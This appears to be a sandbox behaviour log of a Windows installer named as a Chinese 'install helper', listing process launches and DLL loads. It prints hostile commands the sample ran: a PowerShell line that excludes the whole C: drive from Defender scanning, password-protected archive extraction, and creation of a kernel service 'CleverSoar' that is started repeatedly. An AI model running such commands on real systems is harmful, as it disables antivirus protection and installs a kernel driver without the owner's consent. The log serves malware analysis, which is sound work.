Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user~1\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$3043E,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: textinputframework.dllJump to behavior
